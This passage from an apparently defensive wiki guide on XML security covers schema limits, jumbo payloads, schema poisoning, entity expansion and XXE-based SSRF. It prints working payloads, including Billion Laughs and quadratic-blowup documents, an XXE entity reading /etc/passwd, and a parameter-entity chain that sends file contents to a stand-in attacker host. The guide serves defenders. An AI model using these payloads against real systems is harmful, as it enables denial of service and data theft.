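 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:union memberTypes=&amp;quot;xs:negativeInteger xs:positiveInteger&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;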
&lt;br /&gt;
==== Occurrences ====&lt;br /&gt;
Not defining a maximum number of occurrences can have serious consequences when an application receives an extreme number of items to process. Two attributes specify minimum and maximum limits: &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt;. The default value for both the &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and the &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; attributes is &amp;lt;tt&amp;gt;1&amp;lt;/tt&amp;gt;, but certain elements may require other values. For instance, an optional element could have a &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; of &amp;lt;tt&amp;gt;0&amp;lt;/tt&amp;gt;, and an element with no upper limit could have a &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; of &amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;, as in the following example:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;operation&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
      &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;buy&amp;quot; maxOccurs=&amp;quot;unbounded&amp;quot;&amp;gt;&lt;br /&gt;
          &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
            &amp;lt;xs:all&amp;gt;&lt;br /&gt;
              &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
              &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
              &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
            &amp;lt;/xs:all&amp;gt;&lt;br /&gt;
          &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
        &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&amp;lt;/xs:schema&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous schema includes a root element named &amp;lt;tt&amp;gt;operation&amp;lt;/tt&amp;gt;, which can contain an unlimited (&amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;) number of &amp;lt;tt&amp;gt;buy&amp;lt;/tt&amp;gt; elements. This is a common finding, since developers do not normally want to restrict the maximum number of occurrences. Applications using limitless occurrences should test what happens when they receive an extremely large number of elements to be processed. Since computational resources are limited, the consequences should be analyzed, and a maximum number should eventually be used instead of an unbounded value.&lt;br /&gt;
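&lt;br /&gt;
As a hedged sketch of that last recommendation, the &amp;lt;tt&amp;gt;buy&amp;lt;/tt&amp;gt; declaration inside the sequence could carry an explicit upper limit. The value 100 is an assumption chosen for illustration; the right limit depends on what the application can actually process:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;buy&amp;quot; maxOccurs=&amp;quot;100&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:all&amp;gt;&lt;br /&gt;
      &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:positiveInteger&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:all&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;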
&lt;br /&gt;
== Jumbo Payloads ==&lt;br /&gt;
Sending an XML document of 1GB requires only a second of server processing and might not be worth consideration as an attack. Instead, an attacker would look for a way to minimize the CPU and traffic used to generate this type of attack, compared to the overall amount of server CPU or traffic used to handle the requests.&lt;br /&gt;
&lt;br /&gt;
=== Traditional Jumbo Payloads ===&lt;br /&gt;
There are two primary methods to make a document larger than normal:&lt;br /&gt;
* Depth attack: using a huge number of elements, element names, and/or element values.&lt;br /&gt;
* Width attack: using a huge number of attributes, attribute names, and/or attribute values.&lt;br /&gt;
In most cases, the overall result will be a huge document. This is a short example of what this looks like:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;soapenv:Envelope xmlns:soapenv=&amp;quot;http://schemas.xmlsoap.org/soap/envelope/&amp;quot; xmlns:ext=&amp;quot;http://com/ibm/was/wssample/sei/echo/b2b/external&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;soapenv:Header largename1=&amp;quot;largevalue&amp;quot; largename2=&amp;quot;largevalue&amp;quot; largename3=&amp;quot;largevalue&amp;quot; …&amp;gt;&lt;br /&gt;
  ...&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== &amp;quot;Small&amp;quot; Jumbo Payloads ===&lt;br /&gt;
The following example is a very small document, but the results of processing this could be similar to those of processing traditional jumbo payloads. The purpose of such a small payload is that it allows an attacker to send many documents fast enough to make the application consume most or all of the available resources:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE includeme [&lt;br /&gt;
  &amp;lt;!ENTITY file SYSTEM &amp;quot;http://attacker/huge.xml&amp;quot; &amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;includeme&amp;gt;&amp;amp;file;&amp;lt;/includeme&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Schema Poisoning ==&lt;br /&gt;
When an attacker is capable of introducing modifications to a schema, there could be multiple high-risk consequences. In particular, the effect of these consequences will be more dangerous if the schemas are using DTD (e.g., file retrieval, denial of service). An attacker could exploit this type of vulnerability in numerous scenarios, always depending on the location of the schema. &lt;br /&gt;
&lt;br /&gt;
=== Local Schema Poisoning ===&lt;br /&gt;
Local schema poisoning happens when schemas are available on the same host, whether or not the schemas are embedded in the same XML document.&lt;br /&gt;
&lt;br /&gt;
==== Embedded Schema ====&lt;br /&gt;
The most trivial type of schema poisoning takes place when the schema is defined within the same XML document. Consider the following, unknowingly vulnerable example provided by the W3C:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE note [&lt;br /&gt;
  &amp;lt;!ELEMENT note (to,from,heading,body)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT to (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT from (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT heading (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT body (#PCDATA)&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/note&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
All restrictions on the &amp;lt;tt&amp;gt;note&amp;lt;/tt&amp;gt; element could be removed or altered, allowing any type of data to be sent to the server. Furthermore, if the server is processing external entities, the attacker could use the schema, for example, to read files from the server. This type of schema only serves as a suggestion for sending a document, and it must contain a way to check the integrity of the embedded schema to be used safely.&lt;br /&gt;
Attacks through embedded schemas are commonly used to exploit external entity expansions. Embedded XML schemas can also assist in port scans of internal hosts or brute force attacks.&lt;br /&gt;
&lt;br /&gt;
==== Incorrect Permissions ====&lt;br /&gt;
You can often circumvent the risk of using remotely tampered versions by processing a local schema. &lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE note SYSTEM &amp;quot;note.dtd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/note&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
However, if the local schema does not contain the correct permissions, an internal attacker could alter the original restrictions. The following line exemplifies a schema using permissions that allow any user to make modifications:&lt;br /&gt;
 &amp;lt;pre&amp;gt;-rw-rw-rw-  1 user  staff  743 Jan 15 12:32 note.dtd&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The permissions set on &amp;lt;tt&amp;gt;note.dtd&amp;lt;/tt&amp;gt; allow any user on the system to make modifications. This vulnerability is clearly not related to the structure of an XML document or a schema, but since these documents are commonly stored in the filesystem, it is worth mentioning that an attacker could exploit this type of problem.&lt;br /&gt;
&lt;br /&gt;
=== Remote Schema Poisoning ===&lt;br /&gt;
Schemas defined by external organizations are normally referenced remotely. If capable of diverting or accessing the network’s traffic, an attacker could cause a victim to fetch a distinct type of content rather than the one originally intended. &lt;br /&gt;
&lt;br /&gt;
==== Man-in-the-Middle (MitM) Attack ====&lt;br /&gt;
When XML documents reference remote schemas using the unencrypted Hypertext Transfer Protocol (HTTP), the communication is performed in plain text, so an attacker could sniff the connection and modify the schema before it reaches the end user:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE note SYSTEM &amp;quot;http://example.com/note.dtd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/note&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The remote file &amp;lt;tt&amp;gt;note.dtd&amp;lt;/tt&amp;gt; could be susceptible to tampering when transmitted over unencrypted HTTP. One tool available to facilitate this type of attack is mitmproxy.&lt;br /&gt;
&lt;br /&gt;
==== DNS-Cache Poisoning ====&lt;br /&gt;
Remote schema poisoning may also be possible even when using encrypted protocols like Hypertext Transfer Protocol Secure (HTTPS). When software performs reverse Domain Name System (DNS) resolution on an IP address to obtain the hostname, it may not properly ensure that the IP address is truly associated with the hostname. In this case, the software enables an attacker to redirect content to their own Internet Protocol (IP) addresses.&lt;br /&gt;
The previous example referenced the host &amp;lt;tt&amp;gt;example.com&amp;lt;/tt&amp;gt; using an unencrypted protocol. When switching to HTTPS, the location of the remote schema will look like &amp;lt;tt&amp;gt;https://example.com/note.dtd&amp;lt;/tt&amp;gt;. In a normal scenario, the IP of &amp;lt;tt&amp;gt;example.com&amp;lt;/tt&amp;gt; resolves to 1.1.1.1:&lt;br /&gt;
 &amp;lt;pre&amp;gt;$ host example.com&lt;br /&gt;
example.com has address 1.1.1.1&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If an attacker compromises the DNS being used, the previous hostname could now point to a new, different IP controlled by the attacker:&lt;br /&gt;
 &amp;lt;pre&amp;gt;$ host example.com&lt;br /&gt;
example.com has address 2.2.2.2&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
When accessing the remote file, the victim may be actually retrieving the contents of a location controlled by an attacker.&lt;br /&gt;
&lt;br /&gt;
==== Evil Employee Attack ====&lt;br /&gt;
When third parties host and define schemas, the contents are not under the control of the schemas’ users. Any modifications introduced by a malicious employee—or an external attacker in control of these files—could impact all users processing the schemas. Subsequently, attackers could affect the confidentiality, integrity, or availability of other services (especially if the schema in use is DTD).  &lt;br /&gt;
&lt;br /&gt;
== XML Entity Expansion ==&lt;br /&gt;
If the parser uses a DTD, an attacker might inject data that may adversely affect the XML parser during document processing. These adverse effects could include the parser crashing or accessing local files.&lt;br /&gt;
&lt;br /&gt;
=== Recursive Entity Reference ===&lt;br /&gt;
When the definition of an entity &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt; is another entity &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt;, and that entity &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt; is defined as entity &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt;, the schema describes a circular reference between entities:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE A [&lt;br /&gt;
  &amp;lt;!ELEMENT A ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY A &amp;quot;&amp;lt;A&amp;gt;&amp;amp;B;&amp;lt;/A&amp;gt;&amp;quot;&amp;gt; &lt;br /&gt;
  &amp;lt;!ENTITY B &amp;quot;&amp;amp;A;&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;A&amp;gt;&amp;amp;A;&amp;lt;/A&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Quadratic Blowup ===&lt;br /&gt;
Instead of defining multiple small, deeply nested entities, the attacker in this scenario defines one very large entity and refers to it as many times as possible, resulting in a quadratic expansion (O(n&amp;lt;sup&amp;gt;2&amp;lt;/sup&amp;gt;)). Expanding the following document places 100,000 * 100,000 characters in memory.&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT root ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY A &amp;quot;AAAAA...(100,000 A's)...AAAAA&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;root&amp;gt;&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;...(100,000 &amp;amp;A;'s)...&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;...&amp;lt;/root&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Billion Laughs ===&lt;br /&gt;
When an XML parser tries to resolve the entities included within the following code, the application will start consuming all of the available memory until the process crashes. This is an example XML document with an embedded DTD schema including the attack:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE TEST [&lt;br /&gt;
 &amp;lt;!ELEMENT TEST ANY&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;TEST&amp;gt;&amp;amp;LOL9;&amp;lt;/TEST&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The entity &amp;lt;tt&amp;gt;LOL9&amp;lt;/tt&amp;gt; will be resolved as 10 references to &amp;lt;tt&amp;gt;LOL8&amp;lt;/tt&amp;gt;; each of these will be resolved as 10 references to &amp;lt;tt&amp;gt;LOL7&amp;lt;/tt&amp;gt;, and so on. Finally, the CPU and/or memory will be affected by expanding &amp;lt;tt&amp;gt;LOL9&amp;lt;/tt&amp;gt; into 10^9 copies of the string &amp;lt;tt&amp;gt;LOL&amp;lt;/tt&amp;gt;, that is, 3*10^9 (3,000,000,000) characters, which could make the parser crash.&lt;br /&gt;
&lt;br /&gt;
The Simple Object Access Protocol (SOAP) specification forbids DTDs completely. This means that a SOAP processor can reject any SOAP message that contains a DTD. Despite this specification, certain SOAP implementations did parse DTD schemas within SOAP messages. The following example illustrates a case where the parser is not following the specification, enabling a reference to a DTD in a SOAP message:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE SOAP-ENV:Envelope [ &lt;br /&gt;
  &amp;lt;!ELEMENT SOAP-ENV:Envelope ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ATTLIST SOAP-ENV:Envelope entityReference CDATA #IMPLIED&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt; &lt;br /&gt;
&amp;lt;SOAP:Envelope entityReference=&amp;quot;&amp;amp;LOL9;&amp;quot; xmlns:SOAP=&amp;quot;http://schemas.xmlsoap.org/soap/envelope/&amp;quot;&amp;gt; &lt;br /&gt;
  &amp;lt;SOAP:Body&amp;gt; &lt;br /&gt;
    &amp;lt;keyword xmlns=&amp;quot;urn:parasoft:ws:store&amp;quot;&amp;gt;foo&amp;lt;/keyword&amp;gt;&lt;br /&gt;
  &amp;lt;/SOAP:Body&amp;gt;&lt;br /&gt;
&amp;lt;/SOAP:Envelope&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Reflected File Retrieval ===&lt;br /&gt;
Consider the following example code of an XXE:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;ISO-8859-1&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE includeme [&lt;br /&gt;
  &amp;lt;!ELEMENT includeme ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY xxe SYSTEM &amp;quot;/etc/passwd&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;includeme&amp;gt;&amp;amp;xxe;&amp;lt;/includeme&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous XML defines an entity named &amp;lt;tt&amp;gt;xxe&amp;lt;/tt&amp;gt; whose value is the contents of &amp;lt;tt&amp;gt;/etc/passwd&amp;lt;/tt&amp;gt;; it will be expanded within the &amp;lt;tt&amp;gt;includeme&amp;lt;/tt&amp;gt; tag. If the parser allows references to external entities, it might include the contents of that file in the XML response or in the error output.&lt;br /&gt;
&lt;br /&gt;
=== Server Side Request Forgery ===&lt;br /&gt;
Server Side Request Forgery (SSRF) happens when the server receives a malicious XML schema that makes it retrieve remote resources, such as a file over HTTP, HTTPS, or FTP. SSRF has been used to retrieve remote files, to prove an XXE when the file cannot be reflected back, to perform port scanning, and to perform brute force attacks on internal networks.&lt;br /&gt;
&lt;br /&gt;
==== External Connection ====&lt;br /&gt;
Whenever there is an XXE and you cannot retrieve a file, you can test if you would be able to establish remote connections:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE root [ &lt;br /&gt;
  &amp;lt;!ENTITY % xxe SYSTEM &amp;quot;http://attacker/evil.dtd&amp;quot;&amp;gt; &lt;br /&gt;
  %xxe;&lt;br /&gt;
]&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== File Retrieval with Parameter Entities ====&lt;br /&gt;
Parameter entities allow for the retrieval of content using URL references. Consider the following malicious XML document:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;utf-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ENTITY % file SYSTEM &amp;quot;file:///etc/passwd&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY % dtd SYSTEM &amp;quot;http://attacker/evil.dtd&amp;quot;&amp;gt;&lt;br /&gt;
  %dtd;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;root&amp;gt;&amp;amp;send;&amp;lt;/root&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Here the DTD defines two external parameter entities: &amp;lt;tt&amp;gt;file&amp;lt;/tt&amp;gt;, which loads a local file, and &amp;lt;tt&amp;gt;dtd&amp;lt;/tt&amp;gt;, which loads a remote DTD. The remote DTD should contain something like this:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!ENTITY % all &amp;quot;&amp;lt;!ENTITY send SYSTEM 'http://example.com/?%file;'&amp;gt;&amp;quot;&amp;gt;&lt;br /&gt;
%all;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The second DTD causes the system to send the contents of the &amp;lt;tt&amp;gt;file&amp;lt;/tt&amp;gt; back to the attacker's server as a parameter of the URL. &lt;br /&gt;
&lt;br /&gt;
==== Port Scanning ====&lt;br /&gt;
The amount and type of information will depend on the type of implementation. Responses can be classified as follows, ranking from easy to complex:&lt;br /&gt;
&lt;br /&gt;
''' 1) Complete Disclosure '''&lt;br /&gt;
This is the simplest and most unusual scenario: with complete disclosure you can clearly see what is going on, because you receive the complete responses from the server being queried. You have an exact representation of what happened when connecting to the remote host.&lt;br /&gt;
&lt;br /&gt;
''' 2) Error-based '''&lt;br /&gt;
If you are unable to see the response from the remote server, you may be able to use the error response. Consider a web service leaking details on what went wrong in the SOAP Fault element when trying to establish a connection: &lt;br /&gt;
 &amp;lt;pre&amp;gt;java.io.IOException: Server returned HTTP response code: 401 for URL: http://192.168.1.1:80&lt;br /&gt;
	at sun.net.www.protocol.http.HttpURLConnection.getInputStream(HttpURLConnection.java:1459)&lt;br /&gt;
	at com.sun.org.apache.xerces.internal.impl.XMLEntityManager.setupCurrentEntity(XMLEntityManager.java:674)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''' 3) Timeout-based '''&lt;br /&gt;
Timeouts could occur when connecting to open or closed ports, depending on the schema and the underlying implementation. If the timeout occurs while you are trying to connect to a closed port (which may take one minute), the response when connecting to an open port will be very quick (one second, for example). The difference between open and closed ports becomes quite clear.&lt;br /&gt;
&lt;br /&gt;
